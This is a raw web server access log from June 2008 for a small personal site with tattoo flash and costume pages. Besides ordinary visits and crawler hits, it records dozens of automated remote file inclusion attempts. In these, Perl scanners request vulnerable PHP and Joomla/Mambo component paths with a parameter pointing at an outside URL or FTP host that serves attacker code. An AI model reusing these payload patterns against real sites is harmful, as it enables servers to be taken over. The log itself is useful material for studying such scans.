99.231.198.161 - - [12/Jun/2008:09:36:36 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/search?ndsp=21&um=1&hl=en&client=firefox-a&rls=org.mozilla:en-US:official&q=bert%20grimm%20%20flash&ie=UTF-8&sa=N&tab=iw""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
99.231.198.161 - - [12/Jun/2008:09:36:36 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
99.231.198.161 - - [12/Jun/2008:09:36:36 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
99.231.198.161 - - [12/Jun/2008:09:36:36 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
99.231.198.161 - - [12/Jun/2008:09:36:37 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
99.231.198.161 - - [12/Jun/2008:09:36:39 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
99.231.198.161 - - [12/Jun/2008:09:36:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
209.240.231.154 - - [12/Jun/2008:09:38:56 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
209.240.231.154 - - [12/Jun/2008:09:38:56 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
66.98.140.99 - - [12/Jun/2008:09:39:30 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
66.98.140.99 - - [12/Jun/2008:09:39:30 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.65"
74.6.22.89 - - [12/Jun/2008:09:40:14 -0500] "GET /logs/access_log.1175817600 HTTP/1.0" 200 170421 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.89.25.171 - - [12/Jun/2008:09:40:49 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
69.89.25.171 - - [12/Jun/2008:09:40:50 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
62.128.131.80 - - [12/Jun/2008:09:41:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Jun/2008:09:41:17 -0500] "GET //skin/zero_vote/error.php?dir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Jun/2008:09:41:33 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Jun/2008:09:41:33 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
74.53.64.98 - - [12/Jun/2008:09:41:36 -0500] "GET /logs/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.53.64.98 - - [12/Jun/2008:09:41:37 -0500] "GET /index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.55.208.131 - - [12/Jun/2008:09:43:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [12/Jun/2008:09:43:37 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.108.64.164 - - [12/Jun/2008:09:44:03 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.108.64.164 - - [12/Jun/2008:09:44:03 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
82.78.216.197 - - [12/Jun/2008:09:44:25 -0500] "GET /logs/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
82.78.216.197 - - [12/Jun/2008:09:44:25 -0500] "GET /index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
99.231.198.161 - - [12/Jun/2008:09:45:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
170.115.248.20 - - [12/Jun/2008:09:45:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://answers.yahoo.com/question/index?qid=20070729234637AARHCDH""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:31 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:31 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:41 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:41 -0500] "GET /tattoo/tatb10.JPG HTTP/1.0" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:41 -0500] "GET /tattoo/tatb2.JPG HTTP/1.0" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:41 -0500] "GET /tattoo/tatb1.JPG HTTP/1.0" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:41 -0500] "GET /tattoo/tatb3.JPG HTTP/1.0" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:41 -0500] "GET /tattoo/tatb4.JPG HTTP/1.0" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:41 -0500] "GET /tattoo/tatb5.JPG HTTP/1.0" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:42 -0500] "GET /tattoo/tatb7.JPG HTTP/1.0" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:42 -0500] "GET /tattoo/tatb8.JPG HTTP/1.0" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:42 -0500] "GET /tattoo/tatb9.JPG HTTP/1.0" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:45:42 -0500] "GET /tattoo/tatb6.JPG HTTP/1.0" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:33 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:33 -0500] "GET /tattoo/tatc1.JPG HTTP/1.0" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:34 -0500] "GET /tattoo/tatc3.JPG HTTP/1.0" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:34 -0500] "GET /tattoo/tatc2.JPG HTTP/1.0" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:34 -0500] "GET /tattoo/tatc10.JPG HTTP/1.0" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:34 -0500] "GET /tattoo/tatc4.JPG HTTP/1.0" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:35 -0500] "GET /tattoo/tatc6.JPG HTTP/1.0" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:35 -0500] "GET /tattoo/tatc8.JPG HTTP/1.0" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:35 -0500] "GET /tattoo/tatc7.JPG HTTP/1.0" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:35 -0500] "GET /tattoo/tatc9.JPG HTTP/1.0" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
170.115.248.20 - - [12/Jun/2008:09:46:35 -0500] "GET /tattoo/tatc5.JPG HTTP/1.0" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
89.108.64.164 - - [12/Jun/2008:09:47:23 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.108.64.164 - - [12/Jun/2008:09:47:23 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
88.208.118.35 - - [12/Jun/2008:09:53:07 -0500] "GET /logs/lib.php?root=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
88.208.118.35 - - [12/Jun/2008:09:53:07 -0500] "GET /lib.php?root=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
216.6.233.125 - - [12/Jun/2008:09:54:27 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
216.6.233.125 - - [12/Jun/2008:09:54:28 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
89.108.64.164 - - [12/Jun/2008:09:59:37 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.108.64.164 - - [12/Jun/2008:09:59:37 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
89.108.64.164 - - [12/Jun/2008:10:00:44 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.108.64.164 - - [12/Jun/2008:10:00:44 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jun/2008:10:03:56 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.101.24 - - [12/Jun/2008:10:03:57 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
190.54.28.163 - - [12/Jun/2008:10:06:40 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
190.54.28.163 - - [12/Jun/2008:10:06:46 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
82.78.216.197 - - [12/Jun/2008:10:07:30 -0500] "GET /logs/access_log.1208649600/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
82.78.216.197 - - [12/Jun/2008:10:07:30 -0500] "GET /index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
82.78.216.197 - - [12/Jun/2008:10:07:31 -0500] "GET /logs/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
61.70.204.99 - - [12/Jun/2008:10:08:51 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.70.204.99 - - [12/Jun/2008:10:08:51 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.53.64.98 - - [12/Jun/2008:10:10:38 -0500] "GET /logs/access_log.1208649600/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
74.53.64.98 - - [12/Jun/2008:10:10:38 -0500] "GET /index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.53.64.98 - - [12/Jun/2008:10:10:38 -0500] "GET /logs/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.6.22.89 - - [12/Jun/2008:10:11:40 -0500] "GET /logs/access_log.1186358400 HTTP/1.0" 200 156355 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
160.99.12.231 - - [12/Jun/2008:10:11:58 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
160.99.12.231 - - [12/Jun/2008:10:11:58 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
203.146.102.38 - - [12/Jun/2008:10:13:12 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
203.146.102.38 - - [12/Jun/2008:10:13:13 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
203.146.102.38 - - [12/Jun/2008:10:13:15 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
203.146.102.38 - - [12/Jun/2008:10:13:16 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
216.6.233.125 - - [12/Jun/2008:10:14:02 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
216.6.233.125 - - [12/Jun/2008:10:14:03 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.multiplan.pl/cache/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
82.78.216.197 - - [12/Jun/2008:10:16:47 -0500] "GET /logs/access_log.1186358400/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
61.70.204.99 - - [12/Jun/2008:10:18:39 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
61.70.204.99 - - [12/Jun/2008:10:18:39 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
89.108.64.164 - - [12/Jun/2008:10:19:50 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.108.64.164 - - [12/Jun/2008:10:19:51 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
74.53.64.98 - - [12/Jun/2008:10:20:43 -0500] "GET /logs/access_log.1186358400/index1.php?p=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
66.249.70.213 - - [12/Jun/2008:10:23:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.213 - - [12/Jun/2008:10:23:24 -0500] "GET /logs/access_log.1213228800 HTTP/1.1" 200 241196 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.130 - - [12/Jun/2008:10:25:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [12/Jun/2008:10:25:32 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.98.140.99 - - [12/Jun/2008:10:25:45 -0500] "GET /logs/errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.98.140.99 - - [12/Jun/2008:10:25:45 -0500] "GET /errors.php?error=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
66.98.224.22 - - [12/Jun/2008:10:28:01 -0500] "GET /logs//cal/tools/reload_remotes.php?mosConfig_absolute_path=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
66.98.224.22 - - [12/Jun/2008:10:28:01 -0500] "GET //cal/tools/reload_remotes.php?mosConfig_absolute_path=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
190.34.160.226 - - [12/Jun/2008:10:28:01 -0500] "GET /logs//?pg=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 200 87190 "-""libwww-perl/5.805"
190.34.160.226 - - [12/Jun/2008:10:28:06 -0500] "GET //?pg=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
74.6.22.89 - - [12/Jun/2008:10:29:12 -0500] "GET /logs/access_log.1186531200 HTTP/1.0" 200 176700 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.135.32.79 - - [12/Jun/2008:10:29:20 -0500] "GET /logs//cal/tools/reload_remotes.php?mosConfig_absolute_path=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
66.135.32.79 - - [12/Jun/2008:10:29:20 -0500] "GET //cal/tools/reload_remotes.php?mosConfig_absolute_path=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
193.173.48.114 - - [12/Jun/2008:10:37:03 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
193.173.48.114 - - [12/Jun/2008:10:37:04 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
193.173.48.114 - - [12/Jun/2008:10:37:04 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.173.48.114 - - [12/Jun/2008:10:37:04 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
80.82.215.11 - - [12/Jun/2008:10:37:11 -0500] "GET /logs//cal/tools/reload_remotes.php?mosConfig_absolute_path=http://www.tripiwarez.eu/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
80.82.215.11 - - [12/Jun/2008:10:37:11 -0500] "GET //cal/tools/reload_remotes.php?mosConfig_absolute_path=http://www.tripiwarez.eu/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
193.173.48.114 - - [12/Jun/2008:10:39:01 -0500] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
193.173.48.114 - - [12/Jun/2008:10:39:02 -0500] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.106.94.201 - - [12/Jun/2008:10:41:18 -0500] "GET /logs/errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.94.201 - - [12/Jun/2008:10:41:18 -0500] "GET /errors.php?error=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
160.99.12.231 - - [12/Jun/2008:10:42:52 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 369 "-""libwww-perl/5.65"
160.99.12.231 - - [12/Jun/2008:10:42:53 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 364 "-""libwww-perl/5.65"
160.99.12.231 - - [12/Jun/2008:10:43:35 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 371 "-""libwww-perl/5.65"
160.99.12.231 - - [12/Jun/2008:10:43:36 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://medisana.co.kr/test?? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
61.9.184.228 - - [12/Jun/2008:10:47:59 -0500] "GET /logs/access_log.1208649600//init_basic.php?GALLERY_BASEDIR=http://blog.me.lit.edu.tw/adu/special.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
61.9.184.228 - - [12/Jun/2008:10:48:00 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://blog.me.lit.edu.tw/adu/special.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
61.9.184.228 - - [12/Jun/2008:10:48:01 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://blog.me.lit.edu.tw/adu/special.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
212.34.140.215 - - [12/Jun/2008:10:52:18 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
212.34.140.215 - - [12/Jun/2008:10:52:19 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.34.140.215 - - [12/Jun/2008:10:52:19 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
